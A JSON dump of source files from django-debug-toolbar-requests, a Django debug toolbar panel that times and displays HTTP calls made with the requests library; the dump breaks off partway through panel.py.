[ { "alpha_fraction": 0.570514976978302, "alphanum_fraction": 0.5819589495658875, "avg_line_length": 34.23170852661133, "blob_id": "c2274bb47e103b3fa226d2e0c53450638590cdbf", "content_id": "d49955da09e8024c9e4db2ac1a75b8ef3649bdec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2972, "license_type": "no_license", "max_line_length": 98, "num_lines": 82, "path": "/TimeTableModule.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "from SubjectEntryModule import *\r\nfrom openpyxl import *\r\nfrom openpyxl.styles import *\r\n\r\nclass TimeTable:\r\n def __init__(self, subjectList, step=30):\r\n self.subjectList = subjectList\r\n self.step = step\r\n self.baseTimeRange = TimeRange.findTimeRange(subjectList)\r\n\r\n def rowsFromTimeRange(self, timeRange):\r\n firstRow = 2 + (Time.distance(self.baseTimeRange.initial, timeRange.initial) // self.step)\r\n rows = [i + firstRow for i in range(len(timeRange)//self.step)]\r\n return rows\r\n\r\n def getCells(self, day, timeRange):\r\n column = day.getColumn()\r\n rows = self.rowsFromTimeRange(timeRange)\r\n\r\n cells = [column+str(row) for row in rows]\r\n return cells\r\n\r\n def addSubject(self, ws, subject):\r\n\r\n for day in subject.days:\r\n cells = self.getCells(day, subject.timeRange)\r\n ws.merge_cells(\"{}:{}\".format(cells[0], cells[-1]))\r\n for cell in cells:\r\n ws[cell] = \"{}\\n{}\".format(subject.name, str(subject.module))\r\n ws[cell].style = \"subjectStyle\"\r\n\r\n def generateTable(self, filename):\r\n wb = Workbook()\r\n ws = wb.active\r\n self.initStyle(wb)\r\n self.addDays(ws)\r\n self.addTimeMarks(ws)\r\n\r\n for subject in self.subjectList:\r\n self.addSubject(ws, subject)\r\n\r\n #self.setTableBorder(ws)\r\n wb.save(filename)\r\n\r\n def setTableBorder(self, ws):\r\n thickSide = Side(style=\"thick\", color=\"000000\")\r\n boldBorder = Border(right=thickSide, left=thickSide, top=thickSide, bottom=thickSide)\r\n\r\n cellsRange = \"A1:F{}\".format(1+len(self.baseTimeRange)//self.step)\r\n rows = ws[cellsRange]\r\n\r\n for row in rows:\r\n row[0].border = Border(left=thickSide)\r\n row[-1].border = Border(right=thickSide)\r\n for cell in rows[0]:\r\n cell.border = Border(top=thickSide)\r\n\r\n def addDays(self, ws):\r\n ws[\"B1\"] = \"Lunes\"\r\n ws[\"C1\"] = \"Martes\"\r\n ws[\"D1\"] = \"Miércoles\"\r\n ws[\"E1\"] = \"Jueves\"\r\n ws[\"F1\"] = \"Viernes\"\r\n\r\n for colName in [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\"]:\r\n col = ws.column_dimensions[colName]\r\n col.width = 18\r\n\r\n def addTimeMarks(self, ws):\r\n timeList = TimeRange.timeRangeArray(self.baseTimeRange, self.step)\r\n i = 0\r\n for row in ws.iter_rows(min_row=2, max_col=1, max_row=len(timeList)):\r\n for cell in row:\r\n cell.value = str(TimeRange(timeList[i],timeList[i+1]))\r\n i+=1\r\n\r\n def initStyle(self, wb):\r\n centered = Alignment(horizontal=\"center\", vertical=\"center\", wrapText=True)\r\n mediumSide = Side(style=\"medium\", color=\"000000\")\r\n border = Border(left=mediumSide, right=mediumSide, top=mediumSide, bottom=mediumSide)\r\n subjectStyle = NamedStyle(name=\"subjectStyle\", border=border, alignment=centered)\r\n wb.add_named_style(subjectStyle)\r\n" }, { "alpha_fraction": 0.636886715888977, "alphanum_fraction": 0.6414294242858887, "avg_line_length": 37.78313064575195, "blob_id": "03d18c3b5ffe2c3c04d91a3b44afc145cb1044f8", "content_id": "02956dcb5bf3b82c78c527280f45fc24f5cd7a2b", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 3302, "license_type": "no_license", "max_line_length": 203, "num_lines": 83, "path": "/TimeTableGenerator.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "from SubjectEntryModule import *\r\nfrom TimeTableModule import *\r\nfrom SubjectsPermutations import *\r\nfrom TimeModule import TimeRange\r\nimport sys\r\n\r\nVERSION = 0.1\r\n\r\n# Main entry of the program\r\ndef main():\r\n    #Reading arguments from console for: JSON filename, initial time and final time\r\n    if(len(sys.argv) < 4):\r\n        print(\"Incorrect number of parameters!\")\r\n        print(\"You must have: json filename, initial time and final time as parameters\")\r\n        exit()\r\n\r\n    jsonName = sys.argv[1]\r\n    initialTime = Time.fromString(sys.argv[2])\r\n    finalTime = Time.fromString(sys.argv[3])\r\n\r\n    #Welcome message\r\n    welcomeMessage(jsonName, initialTime, finalTime)\r\n\r\n    #Counter for amount of tables generated\r\n    table_number = 0\r\n    myTimeRange = TimeRange(initialTime, finalTime)\r\n\r\n    #Calculating possible combinations of subjects\r\n    tableOfChoices = generateTableFromJSON(\"Resources/{}\".format(jsonName))\r\n\r\n    while(not allTrueInTable(tableOfChoices)):\r\n        #Generate one possible combination\r\n        choices = generateNext(tableOfChoices)\r\n        #Grab the info for that combination\r\n        subjects = SubjectEntry.parseJSONWithChoices(\"Resources/{}\".format(jsonName), choices)\r\n\r\n        #Checking if the list of subjects is compatible, and generating the table if true\r\n        if(checkSubjectList(subjects, False)):\r\n            myTimeTable = TimeTable(subjects)\r\n            if(TimeRange.timeRangesInside(myTimeTable.baseTimeRange, myTimeRange)):\r\n                myTimeTable.generateTable(\"Generated Tables/timeTable{}.xlsx\".format(table_number))\r\n                table_number += 1\r\n\r\n    #Output result\r\n    print(\"{} tables were generated.\".format(table_number))\r\n\r\n#Generate a list of lists of Choices from the json file\r\ndef generateTableFromJSON(filepath):\r\n    myFile = open(filepath, encoding=\"utf-8-sig\")\r\n    myJSON = json.load(myFile)\r\n    myTable = []\r\n    for subject in myJSON:\r\n        choices_list = []\r\n        for choice in myJSON[subject]:\r\n            if(choice != \"name\" and choice != \"module\"):\r\n                choices_list.append(Choice(subject, choice))\r\n        myTable.append(choices_list)\r\n    return myTable\r\n\r\n\r\n#Checks if the subject list doesn't have any overlapping subjects (overlapping timerange and same day)\r\ndef checkSubjectList(subjectList, printing=True):\r\n    overlappingList = SubjectEntry.subjectListOverlap(subjectList)\r\n    if (overlappingList == []): return True\r\n    elif(printing):\r\n        print(\"The following subjects are overlapping: \")\r\n        for pair in overlappingList:\r\n            print(\"{} ({}) and {} ({}) with days in common: {}\".format(pair[0].name, pair[0].timeRange, pair[1].name, pair[1].timeRange, [str(day) for day in SubjectEntry.daysInCommon(pair[0],pair[1])]))\r\n    return False\r\n\r\n#Simple welcome message\r\ndef welcomeMessage(jsonfile, initial, final):\r\n    print(\"=============================================\")\r\n    print(\"              TimeTable Generator ver. {}\".format(VERSION))\r\n    print(\"=============================================\")\r\n    print(\"Current settings:\")\r\n    print(\"   - JSON filename: {}\".format(jsonfile))\r\n    print(\"   - Initial Time: {}\".format(initial))\r\n    print(\"   - Final Time: {}\".format(final))\r\n    print(\"\\nGenerating...\\n\")\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n" }, { "alpha_fraction": 0.7400405406951904, "alphanum_fraction": 0.7427414059638977, "avg_line_length": 58.15999984741211, "blob_id": "9ee09c6dec58a9bd72579d9d58b9fed4dc97c596", "content_id": "355de1c03a4ada692c530566455bf3057777d67e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1484, "license_type": "no_license", "max_line_length": 243, "num_lines": 25, "path": "/README.md", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "# TimeTable-Generator\nConsole program written in Python 3 that generates all possible time arrangements for subjects, given a JSON file with the options\n# Files you need\nIn order to run the program you need a JSON file with the correct format (last section) inside Resources\n# How to run\nIn order to run the program you must have Python 3 installed.\nThen you simply run:\n```\npython TimeTableGenerator.py jsonFileName initialTime finalTime\n```\nWhere ```jsonFileName``` is the file name of the JSON file inside folder \"Resources\" with the possible choices for the subjects (More on this in next section). \nThe parameters ```initialTime``` and ```finalTime``` are a way of choosing only the tables that have all the subjects between those times.\n\n# JSON File\nFor this program to work you need to create a folder called ```Resources``` and include inside of it a JSON file. This file will have all subjects with all the possible time intervals.\nThe format to use is the one in ```Resources/jsonTemplate.json```.\nWhere ```module``` can be ```{\"Teórico\", \"Práctico\", \"Teo-Pra\", \"Consulta\"}```, both ```initialTime``` and ```finalTime``` are given in a 24 hour representation and ```days``` can be ```{\"Lunes\", \"Martes\", \"Miércoles\", \"Jueves\", \"Viernes\"}```.\n\n# Dependencies\nThis program uses ```openpyxl```.\n# TODO\nThere's still a lot of work to do, but the main items right now are:\n\n- Automate JSON file creation with either a UI or cmd prompts.\n- Fix language variations on days and modules.\n\n\n" }, { "alpha_fraction": 0.5609436631202698, "alphanum_fraction": 0.5661861300468445, "avg_line_length": 27.921567916870117, "blob_id": "82c59b75da8520a5926e8f9ede43e39a3701be5f", "content_id": "7638b2cc513c94a5b22ef9dc34c6281bf17cd84d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1526, "license_type": "no_license", "max_line_length": 75, "num_lines": 51, "path": "/SubjectsPermutations.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "class Choice:\r\n    def __init__(self, name, code):\r\n        self.name = name\r\n        self.code = code\r\n        self.visited = False\r\n\r\ndef generateNext(table):\r\n    nextPerm = {}\r\n\r\n    for i in range(len(table)):\r\n        if(allFalseInList(table[i])):\r\n            nextPerm[table[i][0].name] = table[i][0].code\r\n            table[i][0].visited = True\r\n        elif(allTrueInTable(table[i+1:])):\r\n            setAllFalse(table[(i+1):])\r\n            firstFalse = firstFalseIndex(table[i])\r\n            nextPerm[table[i][firstFalse].name] = table[i][firstFalse].code\r\n            table[i][firstFalse].visited = True\r\n        else:\r\n            lastTrue = lastTrueIndex(table[i])\r\n            
nextPerm[table[i][lastTrue].name] = table[i][lastTrue].code\r\n\r\n return nextPerm\r\n\r\ndef allFalseInList(choicesList):\r\n for choice in choicesList:\r\n if(choice.visited == True):\r\n return False\r\n return True\r\n\r\ndef allTrueInTable(table):\r\n for row in table:\r\n for choice in row:\r\n if(choice.visited == False):\r\n return False\r\n return True\r\n\r\ndef setAllFalse(table):\r\n for row in table:\r\n for choice in row:\r\n choice.visited = False\r\n\r\ndef firstFalseIndex(choicesList):\r\n for i in range(len(choicesList)):\r\n if(choicesList[i].visited == False):\r\n return i\r\ndef lastTrueIndex(choicesList):\r\n for i in range(len(choicesList)-1):\r\n if(choicesList[i+1].visited == False):\r\n return i\r\n return len(choicesList)-1\r\n" }, { "alpha_fraction": 0.5848184823989868, "alphanum_fraction": 0.5944994688034058, "avg_line_length": 33.5078125, "blob_id": "6e21676af247a412e9f13eb613e4415595e357a2", "content_id": "a1ed689e69919ee6c9c07a1ab8228c18aa4bd029", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4547, "license_type": "no_license", "max_line_length": 117, "num_lines": 128, "path": "/TimeModule.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "import copy\r\nfrom enum import IntEnum\r\n\r\n#A representation of \"Days\"\r\nclass Days(IntEnum):\r\n LUNES = 0\r\n MARTES = 1\r\n MIERCOLES = 2\r\n JUEVES = 3\r\n VIERNES = 4\r\n\r\n def __str__(self):\r\n if(self.value == 0): return \"Lunes\"\r\n elif(self.value == 1): return \"Martes\"\r\n elif(self.value == 2): return \"Miércoles\"\r\n elif(self.value == 3): return \"Jueves\"\r\n elif(self.value == 4): return \"Viernes\"\r\n\r\n def getColumn(self):\r\n if(self.value == 0): return \"B\"\r\n elif(self.value == 1): return \"C\"\r\n elif(self.value == 2): return \"D\"\r\n elif(self.value == 3): return \"E\"\r\n elif(self.value == 4): return \"F\"\r\n\r\n def fromString(string):\r\n if (string == \"Lunes\"): return Days.LUNES\r\n elif (string == \"Martes\"): return Days.MARTES\r\n elif (string == \"Miércoles\"): return Days.MIERCOLES\r\n elif (string == \"Jueves\"): return Days.JUEVES\r\n elif (string == \"Viernes\"): return Days.VIERNES\r\n\r\n def fromStringArray(stringArr):\r\n daysArray = []\r\n for x in stringArr:\r\n daysArray.append(Days.fromString(x))\r\n return daysArray\r\n\r\nclass Time:\r\n\r\n def __init__(self, hours, minutes):\r\n self.hours = hours\r\n self.minutes = minutes\r\n\r\n def fromString(timeString):\r\n time = timeString.split(':')\r\n timeObj = Time(int(time[0]), int(time[1]))\r\n return timeObj\r\n\r\n def __str__(self):\r\n if (self.minutes > 9):\r\n return \"{}:{}\".format(self.hours, self.minutes)\r\n else:\r\n return \"{}:0{}\".format(self.hours, self.minutes)\r\n\r\n def add(self, minutes):\r\n self.hours += (self.minutes + minutes) // 60\r\n self.minutes = (self.minutes + minutes) % 60\r\n\r\n def isLater(self, otherTime):\r\n return (self.hours > otherTime.hours) or (self.hours == otherTime.hours and self.minutes > otherTime.minutes)\r\n\r\n def isEqual(self, otherTime):\r\n return (self.hours == otherTime.hours) and (self.minutes == otherTime.minutes)\r\n\r\n def distance(time1, time2):\r\n totalMin = 0\r\n if time1<=time2:\r\n minutes = time2.minutes - time1.minutes\r\n hours = time2.hours - time1.hours\r\n totalMin = hours*60 + minutes\r\n else:\r\n minutes = time1.minutes - time2.minutes\r\n hours = time1.hours - time2.hours\r\n totalMin = hours*60 + minutes\r\n return 
totalMin\r\n\r\n def __lt__(self, otherTime):\r\n return not(self.isLater(otherTime)) and not(self.isEqual(otherTime))\r\n\r\n def __le__(self, otherTime):\r\n return not(self.isLater(otherTime))\r\n\r\n def __eq__(self, otherTime):\r\n return self.isEqual(otherTime)\r\n\r\n def __ge__(self, otherTime):\r\n return self.isLater(otherTime) or self.isEqual(otherTime)\r\n\r\n def __gt__(self, otherTime):\r\n return self.isLater(otherTime)\r\n\r\nclass TimeRange:\r\n def __init__(self, initial, final):\r\n self.initial = initial\r\n self.final = final\r\n\r\n def __str__(self):\r\n return \"{} - {}\".format(str(self.initial), str(self.final))\r\n\r\n def __len__(self):\r\n return Time.distance(self.initial, self.final)\r\n\r\n def timeRangeArray(timeRange, step=30):\r\n timeList = []\r\n current = copy.deepcopy(timeRange.initial)\r\n while(current <= timeRange.final):\r\n timeList.append(copy.deepcopy(current))\r\n current.add(step)\r\n return timeList\r\n\r\n def rangesOverlap(firstRange, secondRange):\r\n return ((firstRange.initial >= secondRange.initial) and (firstRange.initial < secondRange.final)\r\n or (firstRange.final>secondRange.initial) and (firstRange.final <= secondRange.final)\r\n or (secondRange.initial >= firstRange.initial) and (secondRange.initial < firstRange.final)\r\n or (secondRange.final > firstRange.initial) and (secondRange.final <= firstRange.final))\r\n\r\n def findTimeRange(subjectList):\r\n lowestTime = subjectList[0].timeRange.initial\r\n highestTime = subjectList[0].timeRange.final\r\n for subject in subjectList:\r\n if(subject.timeRange.initial < lowestTime): lowestTime = subject.timeRange.initial\r\n if(subject.timeRange.final > highestTime): highestTime = subject.timeRange.final\r\n return TimeRange(lowestTime, highestTime)\r\n\r\n #True if second range contains first\r\n def timeRangesInside(first, second):\r\n return (first.initial >= second.initial) and (first.final <= second.final)\r\n" }, { "alpha_fraction": 0.5727163553237915, "alphanum_fraction": 0.5763221383094788, "avg_line_length": 42.37333297729492, "blob_id": "34913d9077ebaf61ba192d93d7ea79347f28b802", "content_id": "569cd97b0cc49eb7fb3103557983772a8e17d2dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3334, "license_type": "no_license", "max_line_length": 173, "num_lines": 75, "path": "/SubjectEntryModule.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "from TimeModule import *\r\nimport json\r\nimport io\r\n\r\nclass SubjectModule(IntEnum):\r\n TEORICO = 0\r\n PRACTICO = 1\r\n TEOPRA = 2\r\n CONSULTA = 3\r\n\r\n def __str__(self):\r\n if(self.value == 0): return \"Teórico\"\r\n elif(self.value == 1): return \"Práctico\"\r\n elif(self.value == 2): return \"Teórico/Práctico\"\r\n elif(self.value == 3): return \"Consulta\"\r\n\r\n def fromString(moduleName):\r\n if(moduleName == \"Teórico\"): return SubjectModule.TEORICO\r\n elif(moduleName == \"Práctico\"): return SubjectModule.PRACTICO\r\n elif(moduleName == \"Teo-Pra\"): return SubjectModule.TEOPRA\r\n elif(moduleName == \"Consulta\"): return SubjectModule.CONSULTA\r\n\r\nclass SubjectEntry:\r\n def __init__(self, name, module, timeRange, days):\r\n self.name = name\r\n self.module = module\r\n self.timeRange = timeRange\r\n self.days = days\r\n\r\n def printEntry(self):\r\n print(\"-------------------------\")\r\n print(\"Subject : {}\\nInitial Time : {}\\nFinal Time : {}\\nDays : {}\".format(self.name, self.timeRange.initial, 
self.timeRange.final, [str(day) for day in self.days]))\r\n print(\"-------------------------\")\r\n\r\n def parseJSON(filepath):\r\n allSubjects = []\r\n myfile = open(filepath, encoding=\"utf-8-sig\")\r\n myJSON = json.load(myfile)\r\n for subject in myJSON:\r\n subJSON = myJSON[subject]\r\n newSubjectEntry = SubjectEntry(subJSON[\"name\"],\r\n SubjectModule.fromString(subJSON[\"module\"]),\r\n TimeRange(Time.fromString(subJSON[\"initialTime\"]),\r\n Time.fromString(subJSON[\"finalTime\"])),\r\n Days.fromStringArray(subJSON[\"days\"]))\r\n allSubjects.append(newSubjectEntry)\r\n return allSubjects\r\n\r\n def parseJSONWithChoices(filepath, choices):\r\n allSubjects = []\r\n myfile = open(filepath, encoding=\"utf-8-sig\")\r\n myJSON = json.load(myfile)\r\n for subject in myJSON:\r\n subJSON = myJSON[subject]\r\n newSubjectEntry = SubjectEntry(subJSON[\"name\"],\r\n SubjectModule.fromString(subJSON[\"module\"]),\r\n TimeRange(Time.fromString(subJSON[choices[subject]][\"initialTime\"]),\r\n Time.fromString(subJSON[choices[subject]][\"finalTime\"])),\r\n Days.fromStringArray(subJSON[choices[subject]][\"days\"]))\r\n allSubjects.append(newSubjectEntry)\r\n return allSubjects\r\n\r\n def daysInCommon(firstSubject, secondSubject):\r\n return list(set(firstSubject.days).intersection(secondSubject.days))\r\n\r\n def subjectsOverlap(firstSubject, secondSubject):\r\n return (SubjectEntry.daysInCommon(firstSubject, secondSubject) != []) and TimeRange.rangesOverlap(firstSubject.timeRange, secondSubject.timeRange)\r\n\r\n def subjectListOverlap(subjectList):\r\n overlapingList = []\r\n for i in range(len(subjectList) - 1):\r\n for j in range(i+1, len(subjectList)):\r\n if(SubjectEntry.subjectsOverlap(subjectList[i], subjectList[j])):\r\n overlapingList.append([subjectList[i], subjectList[j]])\r\n return overlapingList\r\n" } ]
6
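The TimeTable-Generator README above references Resources/jsonTemplate.json without reproducing it. As a minimal sketch of a compatible input file, inferred from generateTableFromJSON() and parseJSONWithChoices() in the record above (the subject key "subject1", the choice codes "A"/"B", the name "Calculus" and the output filename are hypothetical; the field names and the accepted module/day strings come straight from the code):

import json

# Hypothetical example: every key other than "name" and "module" is
# treated as one schedule choice for that subject.
template = {
    "subject1": {
        "name": "Calculus",       # placeholder subject name
        "module": "Teórico",      # one of: Teórico, Práctico, Teo-Pra, Consulta
        "A": {"initialTime": "8:00", "finalTime": "10:00",
              "days": ["Lunes", "Miércoles"]},
        "B": {"initialTime": "14:00", "finalTime": "16:00",
              "days": ["Martes", "Jueves"]},
    }
}

# The generator opens its input with encoding="utf-8-sig", so write it the same way.
with open("Resources/subjects.json", "w", encoding="utf-8-sig") as f:
    json.dump(template, f, ensure_ascii=False, indent=4)

Generating tables from such a file would then be: python TimeTableGenerator.py subjects.json 8:00 18:00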
enginoid/django-debug-toolbar-requests
https://github.com/enginoid/django-debug-toolbar-requests
b6e217505f17d66c71264a0c637a8240f8ef61fe
58a75bf7f17d2670d44d0d54deeb1e6839728a8c
92adf85232b757afc1cb26770ddfac51b1b2cc8a
refs/heads/master
2021-01-01T19:11:05.810259
2012-07-21T14:05:47
2012-07-21T14:05:47
5,115,840
5
0
null
null
null
null
null
[ { "alpha_fraction": 0.6780683994293213, "alphanum_fraction": 0.6780683994293213, "avg_line_length": 28.294116973876953, "blob_id": "92dcbc83554420d8b540621f522c4958c2d0c6f9", "content_id": "599f40ab7b7932c3e59af550a87120cab2bb5d64", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "permissive", "max_line_length": 70, "num_lines": 17, "path": "/debug_toolbar_requests/models.py", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "from debug_toolbar_requests.utils import timedelta_with_milliseconds\n\n\nclass ResponseTimer(object):\n def __init__(self, start_time=None, end_time=None, response=None):\n self.start_time = start_time\n self.end_time = end_time\n self.response = response\n\n @property\n def duration(self):\n seconds = self.end_time - self.start_time\n return timedelta_with_milliseconds(seconds=seconds)\n\n @property\n def request(self):\n return self.response.request" }, { "alpha_fraction": 0.7232704162597656, "alphanum_fraction": 0.7547169923782349, "avg_line_length": 31, "blob_id": "aba2c9219dfbcb13cbe1ea5e687199a7ce9fc908", "content_id": "d9c553a4a7bf17df94c221c87d99486f099951b8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159, "license_type": "permissive", "max_line_length": 53, "num_lines": 5, "path": "/debug_toolbar_requests/utils.py", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "from datetime import timedelta\n\nclass timedelta_with_milliseconds(timedelta):\n def milliseconds(self):\n return int(round(self.microseconds / 1000.0))" }, { "alpha_fraction": 0.517241358757019, "alphanum_fraction": 0.5219650268554688, "avg_line_length": 36.157894134521484, "blob_id": "4957db8bd955d92118568993f5f71143f594e991", "content_id": "ca4b07aa2e9aa3406c501ebd1a5da526899d71f3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 2117, "license_type": "permissive", "max_line_length": 104, "num_lines": 57, "path": "/debug_toolbar_requests/templates/debug_toolbar/panels/requests.html", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "{% load i18n %}\n\n{% for response_timer in response_timers %}\n{% with response_timer.request as request %}\n{% with response_timer.response as response %}\n\n <h4>{{ request.url }}\n ({{ response_timer.duration.milliseconds }} {% trans 'ms' %})</h4>\n\n {% with 'debug_toolbar/panels/snippets/key_value_table.html' as key_value_template %}\n <h5>{% trans \"Response\" %}</h5>\n {% include key_value_template with items=response.template_items %}\n\n <h5>{% trans \"Request\" %}</h5>\n {% include key_value_template with items=request.template_items %}\n\n <h5>{% trans \"Actions\" %}</h5>\n {% if request.is_browser_repeatable %}\n <p>\n {% blocktrans %}\n This functionality is heavily under-tested. 
Please be very\n                    suspicious of this code not accurately replaying requests, but\n                    please do file a bug if that happens.\n                {% endblocktrans %}\n            </p>\n            <form action=\"{{ request.full_url }}\" method=\"{{ request.method }}\"\n                {% if request.files %}enctype=\"multipart/form-data\"{% endif %}>\n\n                {% for name, value in request.data.items %}\n                    <input type=\"hidden\" name=\"{{ name }}\" value=\"{{ value }}\" />\n                {% endfor %}\n\n                {% for name, value in request.files.items %}\n                    <input type=\"hidden\" name=\"{{ name }}\" value=\"{{ value }}\" />\n                {% endfor %}\n\n                <button type=\"submit\">{% trans \"Replay request (in browser)\" %}</button>\n            </form>\n        {% else %}\n            {# TODO: perhaps only display this if toolbar debug is on #}\n            <div>\n                <p>{% trans \"Can't repeat request in browser.\" %}\n                    {% trans \"Conditions not satisfied:\" %}</p>\n                <ul>\n                    {% for condition_name, is_satisfied in request.browser_repeatability_conditions.items %}\n                        {% if not is_satisfied %}\n                            <li>{{ condition_name }}</li>\n                        {% endif %}\n                    {% endfor %}\n                </ul>\n            </div>\n        {% endif %}\n    {% endwith %}\n\n{% endwith %}\n{% endwith %}\n{% endfor %}" }, { "alpha_fraction": 0.6251308917999268, "alphanum_fraction": 0.6293193697929382, "avg_line_length": 34.407405853271484, "blob_id": "a1c73c62edb751dabd102d178b8dc4ad67d1373b", "content_id": "bc9637d0f4b4f3dc3e3b187b73c6c8fb3d5ca673", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 955, "license_type": "permissive", "max_line_length": 76, "num_lines": 27, "path": "/setup.py", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(\n    name='django-debug-toolbar-requests',\n    version='0.0.3',\n    description=('A django-debug-toolbar panel for HTTP requests made with '\n                 'the `requests` library.'),\n    long_description=open('README.rst').read(),\n    author='Fred Jonsson',\n    author_email='[email protected]',\n    url='https://github.com/enginous/django-debug-toolbar-requests',\n    license='BSD',\n    packages=['debug_toolbar_requests'],\n    package_data={'debug_toolbar_requests': ['templates/*.html']},\n    zip_safe=False,\n    include_package_data=True,\n    classifiers=[\n        'Development Status :: 1 - Planning',\n        'Environment :: Web Environment',\n        'Framework :: Django',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: BSD License',\n        'Operating System :: OS Independent',\n        'Programming Language :: Python',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n    ],\n)" }, { "alpha_fraction": 0.5923614501953125, "alphanum_fraction": 0.5929855108261108, "avg_line_length": 43.754188537597656, "blob_id": "5648a30348a4ff187ab67fed2a84a39502a2d35b", "content_id": "c1b4ab8cf9719a2ec8ccbdc402a0064e85534deb", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8012, "license_type": "permissive", "max_line_length": 91, "num_lines": 179, "path": "/debug_toolbar_requests/panel.py", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "from functools import partial\nfrom pprint import pformat\nfrom threading import local\nimport time\n\nimport requests\nimport requests.defaults\n\nfrom django.utils.translation import ugettext_lazy as _, ngettext\nfrom django.template.defaultfilters import truncatechars\n\nfrom debug_toolbar.panels import DebugPanel\n\n# Retain, because it won't be retrievable after monkey-patching.\nfrom debug_toolbar_requests.models import 
ResponseTimer\n\noriginal_thread_class = requests.models.Request\n\nclass RequestsDebugPanel(DebugPanel):\n \"\"\"\n A panel to display HTTP requests made by the `requests` library.\n \"\"\"\n\n name = 'Requests'\n template = 'debug_toolbar/panels/requests.html'\n has_content = True\n\n def receive_response(self, index, response):\n self.thread_locals.response_timers[index].end_time = time.time()\n self.thread_locals.response_timers[index].response = response\n\n def receive_request(self, index, request):\n self.thread_locals.response_timers[index].start_time = time.time()\n\n def __init__(self, *args, **kwargs):\n super(RequestsDebugPanel, self).__init__(*args, **kwargs)\n\n self.thread_locals = local()\n self.thread_locals.response_timers = []\n debug_panel = self\n\n class TrackedRequest(original_thread_class):\n def __init__(self, *args, **kwargs):\n super(TrackedRequest, self).__init__(*args, **kwargs)\n\n response_timer = ResponseTimer()\n next_index = len(debug_panel.thread_locals.response_timers)\n debug_panel.thread_locals.response_timers.append(response_timer)\n\n self.register_hook('pre_request',\n hook=partial(debug_panel.receive_request, next_index))\n self.register_hook('response',\n hook=partial(debug_panel.receive_response, next_index))\n\n # TODO: in the interest of forward-compatibility, can this be done\n # more safely dynamically; e.g. by looking for use of the `Request`\n # object in all package modules?\n requests.models.Request = TrackedRequest\n requests.Request = TrackedRequest\n requests.sessions.Request = TrackedRequest\n\n def nav_title(self):\n return _('HTTP Requests')\n\n def title(self):\n return _('HTTP Requests')\n\n def nav_subtitle(self):\n request_count = len(self.thread_locals.response_timers)\n return ngettext(\"%d request\", \"%d requests\", request_count) % request_count\n\n def url(self):\n return ''\n\n def process_response(self, _request, _response): # unused params\n response_timers = self.thread_locals.response_timers\n for response_timer in response_timers:\n # Tack template-specific information on to the response timer\n # objects to save some boilerplate in the template.\n response = response_timer.response\n response_timer.response.template_items = (\n (_(\"URL\"), response.url),\n (_(\"Status\"), u\"{code} {reason}\".format(\n code=response.status_code, reason=response.reason)),\n (_(\"Headers\"), pformat(response.headers)),\n (_(\"Body\"), truncatechars(response.text, 1024)),\n )\n\n request = response_timer.request\n response_timer.request.template_items = (\n (_(\"URL\"), request.url),\n (_(\"Method\"), request.method),\n (_(\"Headers\"), pformat(request.headers)),\n (_(\"Parameters\"), request.params),\n\n # TODO: it would be nice to get the actual raw body\n (_(\"Data\"), request.data),\n (_(\"Files\"), request.files),\n )\n\n # TODO: this desperately needs tests\n # TODO: the browser replay functionality calls for extraction\n # into its own module.\n def check_browser_compatible_headers(request):\n # We only have access to the resulting headers. To verify\n # that the standard `requests` headers are being sent (which\n # themselves are browser-compatible), we check that the\n # headers sent are exactly equivalent to the default headers\n # sent by `requests`.\n\n # As an exception, we can also support a request if it only\n # adds a `Content-Type` header to the defaults sent by\n # `requests`. 
However, we only support that header if it\n # contains one of the two encodings supported by HTML4.\n browser_supported_enctypes = (\n # automatically sent by browser for every POST form\n 'application/x-www-form-urlencoded',\n\n # sent by POST forms with `enctype` set to this\n 'multipart/form-data'\n )\n\n headers = request.headers.copy() # don't corrupt the original\n header_name = 'Content-Type'\n content_type_header = headers.get(header_name, '')\n for enctype in browser_supported_enctypes:\n # `startswith` is used because we might have a trailing\n # semicolon: multipart/form-data; boundary=foobar\n if content_type_header.startswith(enctype):\n # TODO: need much safer parsing for this, find header lib\n # TODO: also matches 'multipart/form-data-foo`\n # TODO: messy\n del headers[header_name]\n\n return headers == requests.defaults.defaults['base_headers']\n\n # The template displays a button in-browser allowing the user to\n # repeat the call. Because this is done through a form, we cannot\n # allow this for some more complex requests. Multiple conditions\n # are required to determine this, and they are kept in a dict\n # instead of a serial condition for traceability (for debugging,\n # or to show why request can't be displayed in the template).\n response_timer.request.browser_repeatability_conditions = dict(\n is_get_or_post = request.method in ('GET', 'POST'),\n\n # The browser can't send its own headers. We must 